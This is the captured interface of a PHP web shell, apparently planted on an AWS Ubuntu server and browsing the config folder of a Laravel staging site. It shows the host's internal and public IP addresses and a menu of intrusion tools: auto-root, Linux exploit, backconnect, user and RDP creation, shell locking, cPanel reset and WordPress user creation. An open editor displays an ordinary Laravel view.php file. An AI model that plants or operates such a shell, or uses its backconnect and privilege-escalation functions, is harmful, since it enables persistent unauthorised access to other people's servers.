Linux ip-172-31-33-47 5.4.0-1045-aws #47~18.04.1-Ubuntu SMP Tue Apr 13 15:58:14 UTC 2021 x86_64
Apache/2.4.29 (Ubuntu)
: 172.31.33.47 | : 18.188.92.213
Cant Read [ /etc/named.conf ]
7.4.20
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cravings-staging /
config /
[ HOME SHELL ]
Name
Size
Permission
Action
app.php
8.62
KB
-rw-rw-r--
auth.php
3.27
KB
-rw-rw-r--
broadcasting.php
1.57
KB
-rw-rw-r--
cache.php
2.64
KB
-rw-rw-r--
database.php
5.03
KB
-rw-rw-r--
filesystems.php
2.08
KB
-rw-rw-r--
hashing.php
1.53
KB
-rw-rw-r--
logging.php
2.17
KB
-rw-rw-r--
mail.php
4.09
KB
-rw-rw-r--
queue.php
2.58
KB
-rw-rw-r--
sentry.php
1.07
KB
-rw-rw-r--
services.php
1.37
KB
-rw-rw-r--
session.php
6.77
KB
-rw-rw-r--
view.php
1004
B
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : view.php
<?php return [ /* |-------------------------------------------------------------------------- | View Storage Paths |-------------------------------------------------------------------------- | | Most templating systems load templates from disk. Here you may specify | an array of paths that should be checked for your views. Of course | the usual Laravel view path has already been registered for you. | */ 'paths' => [ resource_path('views'), ], /* |-------------------------------------------------------------------------- | Compiled View Path |-------------------------------------------------------------------------- | | This option determines where all the compiled Blade templates will be | stored for your application. Typically, this is within the storage | directory. However, as usual, you are free to change this value. | */ 'compiled' => realpath(storage_path('framework/views')), ];
Close